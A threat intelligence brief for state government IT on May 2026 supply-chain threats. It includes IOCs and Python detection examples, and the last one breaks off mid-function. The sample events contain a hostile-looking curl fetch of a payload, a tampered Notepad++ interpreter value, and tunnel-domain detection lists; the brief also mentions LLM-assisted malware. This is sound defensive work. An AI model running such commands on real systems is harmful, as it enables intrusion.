<p> <strong> Threat Assessment Level: ELEVATED </strong> <em> (unchanged from prior cycle; trending toward HIGH) </em>
</p>
<p> State government IT leaders face a convergence of supply chain threats this week that demands immediate attention. On May 28, CISA issued an emergency alert on malicious Visual Studio Code extensions compromising GitHub repositories. On the same day, Rapid7 disclosed an unpatched critical zero-day in Gogs — a self-hosted Git service — with no vendor response and over 1,100 internet-facing instances exposed. Meanwhile, North Korea's Kimsuky group (APT43) has operationalized VS Code tunneling as a covert command-and-control channel and deployed malware likely developed with the assistance of large language models. And a confirmed breach at Beacon Mutual, a workers' compensation insurer, exposed current and former state employee PII — a textbook third-party supply chain failure.
</p>
<p> These are not theoretical risks. They target the exact tools and partnerships state agencies rely on daily.
</p>
<h2> <strong> What Changed This Week </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Development </strong> </p> </th> <th> <p> <strong> Impact to State Government </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Kimsuky deploys HTTPSpy, HelloDoor (assessed LLM-developed), and VS Code tunneling C2 </p> </td> <td> <p> Developer workstations with VS Code become C2 beacons invisible to network monitoring </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Notepad++ CVE-2026-48778/48770/48800 — RCE via config.xml manipulation </p> </td> <td> <p> <strong> Widely deployed on state admin/developer machines; low-complexity exploitation </strong> </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> CISA Alert: Nx Console VS Code extension supply chain compromise </p> </td> <td> <p> Malicious extension targets CI/CD pipelines; state dev teams at risk </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Rapid7: Gogs zero-day RCE — unpatched, maintainers unresponsive </p> </td> <td> <p> Any state agency running Gogs has no remediation path except migration </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> CISA ICS Advisories: ABB EIBPORT, Schneider EcoStruxure HVAC, XCharge C6 </p> </td> <td> <p> Building automation and HVAC systems in state facilities directly affected </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> COZY BEAR (APT29) — refreshed active indicators </p> </td> <td> <p> Government entities remain primary targeting; updated IOCs require SOC action </p> </td> </tr> <tr> <td> <p> 27 May 2026 </p> </td> <td> <p> Beacon Mutual cyber-attack exposes state employee data </p> </td> <td> <p> Third-party benefits provider breach — PII of current/former state employees compromised </p> </td> </tr> <tr> <td> <p> 26 May 2026 </p> </td> <td> <p> FBI seizes "First VPN Service" infrastructure (prior cycle) </p> </td> <td> <p> ~25 ransomware groups disrupted; adversary migration to new infrastructure expected within 7–14 days </p> </td> </tr> </tbody>
</table>
<p> <strong> Continuity note: </strong> The threat level remains ELEVATED, unchanged from the prior cycle. The Abyss Locker kill chain (SonicWall CVE-2021-20038 exploitation), COZY BEAR (APT29) active indicators, and Iranian actors Nimbus Manticore and WARLORD KITTEN all remain active concerns from the May 28 assessment. No evidence justifies downgrading any of these threats.
</p>
<h2> <strong> Threat Timeline </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Date </strong> </p> </th> <th> <p> <strong> Actor / Event </strong> </p> </th> <th> <p> <strong> Target </strong> </p> </th> <th> <p> <strong> TTP / Vector </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> 27 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> State employees (via Beacon Mutual) </p> </td> <td> <p> Third-party data breach — PII exfiltration </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> Developer ecosystems </p> </td> <td> <p> Malicious VS Code extension (Nx Console) → CI/CD credential theft </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Unattributed </p> </td> <td> <p> Gogs users (1,100+ exposed) </p> </td> <td> <p> Argument injection → authenticated RCE via rebase merging </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> Multiple ICS vendors </p> </td> <td> <p> Building automation, HVAC, EV charging </p> </td> <td> <p> Firmware vulnerabilities in ABB, Schneider, XCharge </p> </td> </tr> <tr> <td> <p> 28 May 2026 </p> </td> <td> <p> COZY BEAR (APT29) </p> </td> <td> <p> Government entities </p> </td> <td> <p> Refreshed indicators (prior cycle, still active) </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> Kimsuky (APT43/DPRK) </p> </td> <td> <p> Government, defense, energy, healthcare </p> </td> <td> <p> HTTPSpy RAT, HelloDoor, VS Code tunneling C2 </p> </td> </tr> <tr> <td> <p> 29 May 2026 </p> </td> <td> <p> N/A (vulnerability) </p> </td> <td> <p> Notepad++ users </p> </td> <td> <p> Config.xml RCE (CVE-2026-48778) </p> </td> </tr> </tbody>
</table>
<h2> <strong> Key Threat Analysis </strong>
</h2>
<h3> <strong> 1. Kimsuky Evolves: VS Code Tunneling and AI-Developed Malware </strong>
</h3>
<p> North Korea's <strong> Kimsuky </strong> (also tracked as APT43) has significantly upgraded its operational tradecraft. Confirmed by both ENKI and Kaspersky, the group is now:
</p>
<ul> <li> <strong> Deploying HTTPSpy RAT </strong> via fake security software installers and spoofed Webex meeting pages </li> <li> <strong> Using VS Code Remote Tunneling </strong> as a persistent C2 channel — traffic routes through Microsoft's vscode.dev infrastructure, appearing as legitimate cloud communication </li> <li> <strong> Fielding HelloDoor </strong> — a Rust-based variant of PebbleDash that Kaspersky assesses was "likely developed using an LLM" </li> <li> <strong> Targeting government, energy, healthcare, and defense </strong> across multiple countries </li>
</ul>
<p> <strong> Why this matters for state government: </strong> VS Code is standard tooling on developer and admin workstations, and Remote Tunnels are a supported Microsoft feature: the tunnel client signs in with a GitHub or Microsoft account and carries its traffic over TLS to Microsoft-operated relay endpoints. Domain reputation, IP blocklists and TLS inspection therefore see only legitimate Microsoft services, and perimeter monitoring will not flag it. Detection has to be host-based (which process opened the tunnel, from what command line, with what persistence) and baseline-based (which hosts are expected to run a tunnel at all).
</p>
<p> <strong> Active IOCs confirmed (confidence 82–89): </strong>
</p>
<ul> <li> Domain: reward.freeddns[.]org </li> <li> IP: 118.194.248[.]246 (port 443) </li> <li> MD5: 7af2d954bdcf0bcf149fc91a856cd7c1 </li> <li> MD5: 1b1d8c182769b55a2eeeaf3364ac2f3e </li> <li> SHA-256: 3fc06b7da8cf9b90ca33601710fe81e90c95fc2c9aa3a906cf248121738e25b3 </li>
</ul>
<h3> <strong> 2. Supply Chain Attack Surface Expanding Across Three Vectors </strong>
</h3>
<p> Three distinct supply chain compromises emerged in a single 48-hour window:
</p>
<p> <strong> Vector 1 — Malicious VS Code Extension (Nx Console) </strong>
</p>
<p> CISA's alert identifies a compromised Visual Studio Code extension targeting CI/CD pipelines. Attackers gain access to GitHub repository tokens, pipeline secrets, and source code. Full IOCs pending from CISA.
</p>
<p> <strong> Vector 2 — Gogs Self-Hosted Git Zero-Day </strong>
</p>
<p> Rapid7 disclosed a critical argument injection vulnerability in Gogs' rebase-merge handling that gives an authenticated user remote code execution as the Gogs service account. The exploit is automated and runs in seconds; code execution as that account means read access to every repository on the instance, and to anything else the account can reach. <strong> There is no patch. The maintainers have been unresponsive for two months. </strong> The precondition is a valid account, so instances with open self-registration or exposed to the internet carry the most risk. Any state agency running Gogs has a permanent vulnerability until the software is removed.
</p>
<p> <strong> Vector 3 — Third-Party Data Processor Breach (Beacon Mutual) </strong>
</p>
<p> A cyber-attack on Beacon Mutual, a Rhode Island workers' compensation insurer, exposed PII of current and former state employees. This is the supply chain risk that keeps CISOs awake — a vendor you may not even think of as a "technology partner" holding sensitive employee data.
</p>
<h3> <strong> 3. Notepad++ RCE — CVE-2026-48778 </strong>
</h3>
<p> Three vulnerabilities patched in Notepad++ 8.9.6.1. The most severe, <strong> CVE-2026-48778 </strong> , enables remote code execution through manipulation of config.xml: an attacker who can write the commandLineInterpreter setting in that file gets their payload executed when the user selects "Open Containing Folder in cmd." The CVSS attack complexity is low and no privileges are required, but the attacker does need write access to the user's config.xml (local access, a synced profile, or a shared drive) and the user has to trigger the menu item.
</p>
<p> <strong> CVE-2026-48800 </strong> enables RCE via shortcuts.xml. <strong> CVE-2026-48770 </strong> causes denial of service.
</p>
<p> Notepad++ is ubiquitous on state developer and admin workstations. Because config.xml lives in the user's roaming profile (%APPDATA%\Notepad++) for installed copies, or alongside the executable for portable copies, a profile synced via shared drives, roaming profiles, or cloud storage turns this into a supply chain vector: poison the config once and every endpoint that syncs it is primed.
</p>
<h3> <strong> 4. ICS/Building Automation Vulnerabilities </strong>
</h3>
<p> CISA issued 10 ICS advisories on May 28. Most relevant to state facilities:
</p>
<ul> <li> <strong> ABB EIBPORT </strong> — building automation controller (firmware update available) </li> <li> <strong> Schneider Electric EcoStruxure Machine Expert HVAC </strong> — HVAC control system </li> <li> <strong> XCharge C6 </strong> — EV charging station (admin rights / code execution) </li> <li> <strong> USR-W610 </strong> — RS232/485 to Wi-Fi/Ethernet converter (admin access) </li>
</ul>
<p> State government buildings, data centers, and facilities likely run ABB and Schneider building automation. These systems are often managed by facilities teams with limited cybersecurity oversight.
</p>
<h3> <strong> 5. Persistent Nation-State Threats (Continuing from Prior Cycle) </strong>
</h3>
<table> <thead> <tr> <th> <p> <strong> Actor </strong> </p> </th> <th> <p> <strong> Origin </strong> </p> </th> <th> <p> <strong> Status </strong> </p> </th> <th> <p> <strong> Targeting </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> <strong> Kimsuky (APT43) </strong> </p> </td> <td> <p> DPRK </p> </td> <td> <p> Active — fresh IOCs, new TTPs </p> </td> <td> <p> Government, defense, energy, healthcare </p> </td> </tr> <tr> <td> <p> <strong> COZY BEAR (APT29) </strong> </p> </td> <td> <p> Russia (SVR) </p> </td> <td> <p> Active — refreshed indicators (28 May) </p> </td> <td> <p> Government entities </p> </td> </tr> <tr> <td> <p> <strong> Nimbus Manticore </strong> </p> </td> <td> <p> Iran (IRGC) </p> </td> <td> <p> Active </p> </td> <td> <p> Government — AI-assisted malware </p> </td> </tr> <tr> <td> <p> <strong> WARLORD KITTEN </strong> </p> </td> <td> <p> Iran </p> </td> <td> <p> Active (single-source attribution) </p> </td> <td> <p> Government, telecom </p> </td> </tr> <tr> <td> <p> <strong> Volt Typhoon </strong> </p> </td> <td> <p> China </p> </td> <td> <p> No collection — concerning absence </p> </td> <td> <p> <strong> U.S. critical infrastructure pre-positioning </strong> </p> </td> </tr> <tr> <td> <p> <strong> Salt Typhoon </strong> </p> </td> <td> <p> China </p> </td> <td> <p> No collection — concerning absence </p> </td> <td> <p> <strong> U.S. critical infrastructure </strong> </p> </td> </tr> </tbody>
</table>
<p> <strong> Critical absence: </strong> Zero intelligence collection on Volt Typhoon and Salt Typhoon despite documented pre-positioning in U.S. critical infrastructure. This is not reassurance — it may indicate collection gaps or stealthy pre-positioning below detection thresholds.
</p>
<h2> <strong> Predictive Analysis </strong>
</h2>
<table> <thead> <tr> <th> <p> <strong> Scenario </strong> </p> </th> <th> <p> <strong> Probability </strong> </p> </th> <th> <p> <strong> Timeframe </strong> </p> </th> <th> <p> <strong> Basis </strong> </p> </th> </tr> </thead> <tbody> <tr> <td> <p> CISA publishes full Nx Console IOCs enabling detection </p> </td> <td> <p> <strong> HIGH (85%) </strong> </p> </td> <td> <p> 48–72 hours </p> </td> <td> <p> Standard CISA disclosure cadence </p> </td> </tr> <tr> <td> <p> Gogs zero-day exploitation begins at scale </p> </td> <td> <p> <strong> HIGH (80%) </strong> </p> </td> <td> <p> 7 days </p> </td> <td> <p> Public PoC + 1,100 exposed instances + no patch </p> </td> </tr> <tr> <td> <p> Kimsuky expands VS Code tunneling to Western government targets </p> </td> <td> <p> <strong> MODERATE (55%) </strong> </p> </td> <td> <p> 30 days </p> </td> <td> <p> TTPs are transferable; government targeting confirmed </p> </td> </tr> <tr> <td> <p> Ransomware group claims state/local government victim </p> </td> <td> <p> <strong> MODERATE (50%) </strong> </p> </td> <td> <p> 7 days </p> </td> <td> <p> Rhysida/Qilin/Akira all active against gov sector; FBI VPN seizure forcing infrastructure migration </p> </td> </tr> <tr> <td> <p> Notepad++ CVE-2026-48778 exploited in the wild </p> </td> <td> <p> <strong> MODERATE (45%) </strong> </p> </td> <td> <p> 14 days </p> </td> <td> <p> <strong> PoC available, widely deployed, low complexity </strong> </p> </td> </tr> <tr> <td> <p> Volt Typhoon/Salt Typhoon activity surfaces in state networks </p> </td> <td> <p> <strong> LOW-MODERATE (30%) </strong> </p> </td> <td> <p> 30 days </p> </td> <td> <p> Documented pre-positioning but no current indicators </p> </td> </tr> </tbody>
</table>
<h2> <strong> SOC Operational Guidance </strong>
</h2>
<h3> <strong> Detection Priorities </strong>
</h3>
<ol> <li> <strong> VS Code Tunneling C2 Detection (Kimsuky — </strong> <strong> T1572 </strong> <strong> Protocol Tunneling) </strong> </li>
</ol>
<ul> <li> <strong> Hunt hypothesis: </strong> Adversary establishes persistent C2 via VS Code Remote Tunneling on compromised workstations. Traffic appears as legitimate HTTPS to Microsoft infrastructure. </li> <li> <strong> Detection: </strong> Alert on code.exe or code-tunnel processes (the "code tunnel" CLI) establishing persistent outbound connections on machines where VS Code is NOT in the approved software baseline, or on non-developer endpoints. A tunnel also requires a device-code sign-in to GitHub or Microsoft from that host, which is a second, independent signal in proxy and identity logs. </li> <li> <strong> Network indicators: </strong> Sustained connections to *.vscode.dev or tunnel.vscode.dev from unexpected hosts. The tunnel client also talks to Microsoft's dev tunnel relay (*.devtunnels.ms and *.tunnels.api.visualstudio.com), so include those domains in the same rule; they can be blocked for non-developer hosts, but not enterprise-wide without breaking legitimate remote-development use. </li> <li> <strong> ATT&CK: </strong> T1572 (Protocol Tunneling), T1071.001 (Web Protocols), T1102 (Web Service) </li>
</ul>
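<p> The host-based correlation described above, as an added example that is not part of the original report: it joins Sysmon-style process-create and network-connect events, flags tunnel relay traffic from any host outside the developer baseline as high severity, and flags tunnels on baseline hosts for owner confirmation. The events, hostnames and baseline are constructed; the relay domains are *.vscode.dev from this report plus the dev tunnel endpoints Microsoft documents for the tunnel client (assumed to be the public relay, not a private deployment).
</p>

```python
"""Host-based detection for VS Code Remote Tunnel C2 (T1572).

Added example. Correlates Sysmon-style process-create (EventID 1) and
network-connect (EventID 3) events and reports tunnel relay traffic per
(host, process). Events, hosts and baseline below are constructed samples.
"""
from __future__ import annotations

import fnmatch
import json
import ntpath
from collections import defaultdict

# Relay domains: *.vscode.dev as named in the report, plus the dev tunnel relay
# endpoints Microsoft documents for the tunnel client (assumption: public relay).
TUNNEL_DOMAIN_PATTERNS = (
    "vscode.dev",
    "*.vscode.dev",
    "*.devtunnels.ms",
    "*.tunnels.api.visualstudio.com",
)
# Process images that carry the tunnel client (Windows and POSIX names).
TUNNEL_IMAGES = {"code.exe", "code-tunnel.exe", "code", "code-tunnel"}
# Hosts where a VS Code tunnel is an approved use (assumed inventory).
DEVELOPER_BASELINE = {"dev-ws-0412", "dev-ws-0413"}
# Relay connects per process within one batch that count as "sustained".
SUSTAINED_THRESHOLD = 3

# Constructed sample events, one JSON object per line, Sysmon field names.
SAMPLE_EVENTS = r"""
{"EventID":1,"Computer":"dev-ws-0412","ProcessId":5120,"Image":"C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe","CommandLine":"Code.exe"}
{"EventID":3,"Computer":"dev-ws-0412","ProcessId":5120,"Image":"C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe","DestinationHostname":"marketplace.visualstudio.com","DestinationPort":443}
{"EventID":1,"Computer":"fin-ws-2207","ProcessId":3388,"Image":"C:\\Users\\Public\\code-tunnel.exe","CommandLine":"C:\\Users\\Public\\code-tunnel.exe tunnel --accept-server-license-terms --name fin-ws-2207"}
{"EventID":3,"Computer":"fin-ws-2207","ProcessId":3388,"Image":"C:\\Users\\Public\\code-tunnel.exe","DestinationHostname":"global.rel.tunnels.api.visualstudio.com","DestinationPort":443}
{"EventID":3,"Computer":"fin-ws-2207","ProcessId":3388,"Image":"C:\\Users\\Public\\code-tunnel.exe","DestinationHostname":"global.rel.tunnels.api.visualstudio.com","DestinationPort":443}
{"EventID":3,"Computer":"fin-ws-2207","ProcessId":3388,"Image":"C:\\Users\\Public\\code-tunnel.exe","DestinationHostname":"global.rel.tunnels.api.visualstudio.com","DestinationPort":443}
{"EventID":1,"Computer":"dev-ws-0413","ProcessId":4410,"Image":"C:\\Users\\dev2\\AppData\\Local\\Programs\\Microsoft VS Code\\bin\\code-tunnel.exe","CommandLine":"code-tunnel.exe tunnel --accept-server-license-terms"}
{"EventID":3,"Computer":"dev-ws-0413","ProcessId":4410,"Image":"C:\\Users\\dev2\\AppData\\Local\\Programs\\Microsoft VS Code\\bin\\code-tunnel.exe","DestinationHostname":"global.rel.tunnels.api.visualstudio.com","DestinationPort":443}
"""


def _basename(path: str) -> str:
    """Lower-cased image basename for Windows or POSIX paths."""
    return ntpath.basename(path.replace("/", "\\")).lower()


def _is_tunnel_domain(hostname: str) -> bool:
    host = hostname.lower()
    return any(fnmatch.fnmatchcase(host, pat) for pat in TUNNEL_DOMAIN_PATTERNS)


def parse_events(raw: str) -> list[dict]:
    return [json.loads(line) for line in raw.splitlines() if line.strip()]


def detect_vscode_tunnels(events: list[dict], baseline=DEVELOPER_BASELINE) -> list[dict]:
    """One finding per (host, process) that connects to the tunnel relay."""
    cmdlines: dict[tuple, str] = {}
    relay_connects: dict[tuple, list] = defaultdict(list)
    for ev in events:
        key = (ev["Computer"], ev["ProcessId"])
        image = _basename(ev.get("Image", ""))
        if ev["EventID"] == 1:
            cmdlines[key] = ev.get("CommandLine", "")
        elif (ev["EventID"] == 3 and image in TUNNEL_IMAGES
              and _is_tunnel_domain(ev.get("DestinationHostname", ""))):
            relay_connects[key + (image,)].append(ev["DestinationHostname"])

    findings = []
    for (host, pid, image), dests in relay_connects.items():
        tokens = cmdlines.get((host, pid), "").lower().split()
        tunnel_subcommand = "tunnel" in tokens  # the `code tunnel ...` CLI form
        if host not in baseline:
            severity, reason = "high", "tunnel relay traffic from host outside developer baseline"
        elif tunnel_subcommand or len(dests) >= SUSTAINED_THRESHOLD:
            severity, reason = "medium", "tunnel on baseline host; confirm the owner opted in"
        else:
            continue
        findings.append({"host": host, "pid": pid, "image": image, "severity": severity,
                         "connections": len(dests), "destinations": sorted(set(dests)),
                         "reason": reason})
    return findings


if __name__ == "__main__":
    for f in detect_vscode_tunnels(parse_events(SAMPLE_EVENTS)):
        print(f["severity"].upper(), f["host"], f["image"], f["connections"], f["reason"])
```

<p> The baseline is the decisive input: the same relay traffic is expected on a developer's machine and is a beacon on a finance workstation, so keep the list of tunnel-approved hosts in the detection rule, not in an analyst's head.
</p>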
<ol start="2"> <li> <strong> Malicious VS Code Extension Detection ( </strong> <strong> T1195.002 </strong> <strong> Supply Chain Compromise) </strong> </li>
</ol>
<ul> <li> <strong> Hunt hypothesis: </strong> Compromised Nx Console extension exfiltrates CI/CD tokens and pipeline secrets. </li> <li> <strong> Detection: </strong> Audit installed VS Code extensions across all developer workstations; the per-machine list with versions comes from "code --list-extensions --show-versions", and the same data is in extensions.json under the user's .vscode/extensions directory. Compare against a known-good list pinned by version. Alert on extensions with recent unexpected updates or unknown publishers, and on any extension whose version is absent from the allowlist, since a compromised release arrives as an ordinary auto-update. </li> <li> <strong> ATT&CK: </strong> T1195.002 (Supply Chain Compromise), T1552.001 (Credentials in Files), T1098 (Account Manipulation) </li>
</ul>
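<p> The extension audit described above, as an added example that is not part of the original report: it parses captured "code --list-extensions --show-versions" output per host and reports extensions that are not on the allowlist, have drifted from their pinned version, or come from an unapproved publisher. The allowlist, publisher set, hostnames and versions are constructed placeholders; nrwl.angular-console is Nx Console's Marketplace identifier, but no version here is claimed malicious, since the report notes CISA's IOCs are still pending.
</p>

```python
"""Audit installed VS Code extensions against a pinned allowlist (T1195.002).

Added example. Input per host is the captured output of
`code --list-extensions --show-versions`, one `publisher.name@version`
per line. Allowlist, trusted publishers and inventory are constructed
samples; version numbers are placeholders, not real releases.
"""
import re

EXT_LINE = re.compile(
    r"^(?P<publisher>[A-Za-z0-9_-]+)\.(?P<name>[A-Za-z0-9_.-]+)@(?P<version>[A-Za-z0-9_.-]+)$"
)

# Constructed allowlist: extension id -> the one version vetted for deployment.
APPROVED = {
    "ms-python.python": "2026.4.0",
    "ms-vscode.cpptools": "1.24.5",
    "eamodio.gitlens": "17.1.0",
}
TRUSTED_PUBLISHERS = {"ms-python", "ms-vscode", "eamodio"}

# Constructed inventory: host -> captured `code --list-extensions --show-versions`.
SAMPLE_INVENTORY = {
    "dev-ws-0412": (
        "ms-python.python@2026.4.0\n"
        "ms-vscode.cpptools@1.24.5\n"
        "nrwl.angular-console@18.70.2\n"   # Nx Console's Marketplace id; version is a placeholder
    ),
    "dev-ws-0413": (
        "ms-python.python@2026.4.1\n"      # drifted from the pinned version
        "eamodio.gitlens@17.1.0\n"
        "garbage line\n"                   # unparseable output must surface, not vanish
    ),
}


def audit_host(host, listing, approved=APPROVED, trusted=TRUSTED_PUBLISHERS):
    """Return findings for one host's extension listing."""
    findings = []
    for raw in listing.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = EXT_LINE.match(line)
        if not m:
            findings.append({"host": host, "extension": line, "kind": "unparseable",
                             "detail": "line does not match publisher.name@version"})
            continue
        ext_id = f"{m['publisher']}.{m['name']}"
        version = m["version"]
        if ext_id not in approved:
            findings.append({"host": host, "extension": ext_id, "kind": "unvetted",
                             "detail": f"installed {version}, not on allowlist"})
        elif version != approved[ext_id]:
            # An auto-update is how a compromised release lands; drift is the signal.
            findings.append({"host": host, "extension": ext_id, "kind": "version_drift",
                             "detail": f"pinned {approved[ext_id]}, found {version}"})
        if m["publisher"] not in trusted:
            findings.append({"host": host, "extension": ext_id, "kind": "untrusted_publisher",
                             "detail": f"publisher {m['publisher']} not approved"})
    return findings


def audit_inventory(inventory=SAMPLE_INVENTORY, **kw):
    """Audit every host and return the combined, host-sorted findings."""
    findings = []
    for host in sorted(inventory):
        findings.extend(audit_host(host, inventory[host], **kw))
    return findings


if __name__ == "__main__":
    for f in audit_inventory():
        print(f"{f['host']:<12} {f['kind']:<20} {f['extension']:<28} {f['detail']}")
```

<p> Pinning by version rather than by extension id is the point: an allowlist that only names extensions would have passed a trojanized update of an already-approved one.
</p>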
<ol start="3"> <li> <strong> Notepad++ Config Manipulation (CVE-2026-48778 — </strong> <strong> T1059.003 </strong> <strong> Windows Command Shell) </strong> </li>
</ol>
<ul> <li> <strong> Hunt hypothesis: </strong> Attacker modifies config.xml to inject malicious commandLineInterpreter value. </li> <li> <strong> Detection: </strong> File integrity monitoring on config.xml and shortcuts.xml, which live in %APPDATA%\Notepad++ for installed copies and next to notepad++.exe for portable copies. Notepad++ rewrites config.xml on every clean exit, so alerting on any modification is noisy; alert instead on the content: a commandLineInterpreter value other than the default (cmd) or the interpreter your baseline sets, and treat any value containing a path, arguments or a network share as high severity. </li> <li> <strong> ATT&CK: </strong> T1059.003 (Windows Command Shell), T1574.001 (Executable Path Interception) </li>
</ul>
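<p> The content check described above, as an added example that is not part of the original report: it parses config.xml, inspects the commandLineInterpreter GUIConfig, grades a non-default value by whether it looks like a bare interpreter name or a path with arguments, and pairs that with a plain SHA-256 baseline for shortcuts.xml. The XML excerpts are constructed to match the Notepad++ 8.x GUIConfig layout; the tampered value is a placeholder, not a known payload; the allowed-interpreter set is an assumption to be adjusted to your baseline.
</p>

```python
"""Notepad++ config tampering check (CVE-2026-48778 class) plus hash baseline.

Added example. Parses config.xml for the commandLineInterpreter setting the
"Open Containing Folder in cmd" action executes, and provides a SHA-256
baseline helper for shortcuts.xml. XML excerpts below are constructed to
match the Notepad++ 8.x GUIConfig layout; values are placeholders.
"""
import hashlib
import os
import xml.etree.ElementTree as ET

# Default is "cmd"; extend only with interpreters your baseline deliberately sets.
ALLOWED_INTERPRETERS = {"cmd", "cmd.exe"}
SUSPICIOUS_CHARS = " \\/:\"'%$|&"   # paths, arguments, shares, variables

BENIGN_CONFIG = r"""<?xml version="1.0" encoding="UTF-8" ?>
<NotepadPlus>
  <GUIConfigs>
    <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
    <GUIConfig name="commandLineInterpreter">cmd</GUIConfig>
  </GUIConfigs>
</NotepadPlus>"""

POWERSHELL_CONFIG = r"""<NotepadPlus><GUIConfigs>
  <GUIConfig name="commandLineInterpreter">powershell</GUIConfig>
</GUIConfigs></NotepadPlus>"""

# Constructed tampered value: a dropped binary, not a known real payload.
TAMPERED_CONFIG = r"""<NotepadPlus><GUIConfigs>
  <GUIConfig name="commandLineInterpreter">C:\Users\Public\Libraries\wupdate.exe /q</GUIConfig>
</GUIConfigs></NotepadPlus>"""

# Older config with no such element: Notepad++ falls back to the default.
NO_SETTING_CONFIG = r"""<NotepadPlus><GUIConfigs>
  <GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
</GUIConfigs></NotepadPlus>"""


def candidate_config_dirs(install_dir=None):
    """Directories Notepad++ reads config.xml/shortcuts.xml from: %APPDATA%\\Notepad++
    for an installed copy, the program directory for a portable copy."""
    dirs = []
    appdata = os.environ.get("APPDATA")
    if appdata:
        dirs.append(os.path.join(appdata, "Notepad++"))
    if install_dir:
        dirs.append(install_dir)
    return dirs


def check_config_xml(xml_text):
    """Return findings for config.xml content (str or bytes). No element = default."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    for node in root.iter("GUIConfig"):
        if node.get("name") != "commandLineInterpreter":
            continue
        value = (node.text or "").strip()
        if not value or value.lower() in ALLOWED_INTERPRETERS:
            continue
        # A bare name (e.g. powershell) may be a deliberate choice; a path or
        # arguments is the shape of the CVE-2026-48778 abuse.
        suspicious = any(ch in value for ch in SUSPICIOUS_CHARS)
        findings.append({
            "setting": "commandLineInterpreter",
            "value": value,
            "severity": "high" if suspicious else "medium",
            "reason": "executed by Edit > Open Containing Folder in cmd",
        })
    return findings


def file_digest(data: bytes) -> str:
    """SHA-256 of file content, for a shortcuts.xml/config.xml baseline."""
    return hashlib.sha256(data).hexdigest()


def integrity_changed(data: bytes, baseline_digest: str) -> bool:
    return file_digest(data) != baseline_digest


if __name__ == "__main__":
    for label, cfg in (("benign", BENIGN_CONFIG), ("powershell", POWERSHELL_CONFIG),
                       ("tampered", TAMPERED_CONFIG), ("absent", NO_SETTING_CONFIG)):
        print(label, check_config_xml(cfg))
```

<p> Run the content check on a schedule from the endpoint agent rather than on every write event; the hash baseline is still useful for shortcuts.xml, which changes far less often than config.xml.
</p>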
<ol start="4"> <li> <strong> Gogs Exploitation ( </strong> <strong> T1190 </strong> <strong> Exploit Public-Facing Application) </strong> </li>
</ol>
<ul> <li> <strong> Hunt hypothesis: </strong> Authenticated attacker exploits rebase merge argument injection for RCE. </li> <li> <strong> Detection: </strong> If Gogs is deployed, monitor for unusual process spawning from the Gogs service account (typically git). Gogs legitimately spawns git and the shell wrappers for its repository hooks; alert on any other child, and on any descendant of a git rebase process that is not git itself. Also review the Gogs web log for rebase-merge requests from accounts created shortly before the activity. </li> <li> <strong> ATT&CK: </strong> T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter) </li>
</ul>
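<p> The process-lineage hunt described above, as an added example that is not part of the original report or of Gogs: it rebuilds the process tree from execve-style events, flags any descendant of a git rebase under the service account that is not git, and separately flags any process that account runs outside the set Gogs legitimately spawns. The events are constructed (the injected rebase argument is deliberately omitted; the child process is the signal), and the service user name, the allowed-process sets and the hook interpreters are assumptions to match to your deployment.
</p>

```python
"""Process-lineage hunt for Gogs post-exploitation (T1190 -> T1059).

Added example. Two rules over execve-style process events (constructed,
auditd/eBPF-like fields):
  1. any descendant of a `git rebase` run by the Gogs service account that
     is not git itself;
  2. any process owned by that account outside the set it legitimately runs.
Service user, allowed sets and events are assumptions, not Gogs' own code.
"""
from collections import defaultdict

GOGS_USER = "git"                                 # assumption: Gogs runs as `git`
REBASE_ALLOWED = {"git"}                          # a rebase subtree holds only git
ACCOUNT_ALLOWED = {"gogs", "git", "sh", "bash"}   # sh/bash: Gogs' hook wrappers

# Constructed sample events. The rebase at pid 1401 omits the injected
# argument; what gives it away is the shell it spawns.
SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 1,    "user": "git", "comm": "gogs", "cmdline": "/home/git/gogs/gogs web"},
    {"pid": 1301, "ppid": 1200, "user": "git", "comm": "git",  "cmdline": "git rebase --onto master dev"},
    {"pid": 1302, "ppid": 1301, "user": "git", "comm": "git",  "cmdline": "git merge-base master dev"},
    {"pid": 1401, "ppid": 1200, "user": "git", "comm": "git",  "cmdline": "git rebase --onto master feature"},
    {"pid": 1402, "ppid": 1401, "user": "git", "comm": "sh",   "cmdline": "sh -c /tmp/.cache/run"},
    {"pid": 1403, "ppid": 1402, "user": "git", "comm": "curl", "cmdline": "curl -s http://203.0.113.5/x -o /tmp/x"},
    {"pid": 1501, "ppid": 1200, "user": "git", "comm": "git",  "cmdline": "git receive-pack /home/git/gogs-repositories/a/b.git"},
    {"pid": 1502, "ppid": 1501, "user": "git", "comm": "bash", "cmdline": "bash hooks/post-receive"},
]


def build_tree(events):
    """Index events by pid and map each ppid to its children."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def descendants(children, pid):
    """All transitive children of pid; guards against cycles in a bad feed."""
    stack, seen = list(children.get(pid, [])), []
    while stack:
        p = stack.pop()
        if p in seen:
            continue
        seen.append(p)
        stack.extend(children.get(p, []))
    return seen


def _is_rebase(event, user):
    argv = event["cmdline"].split()
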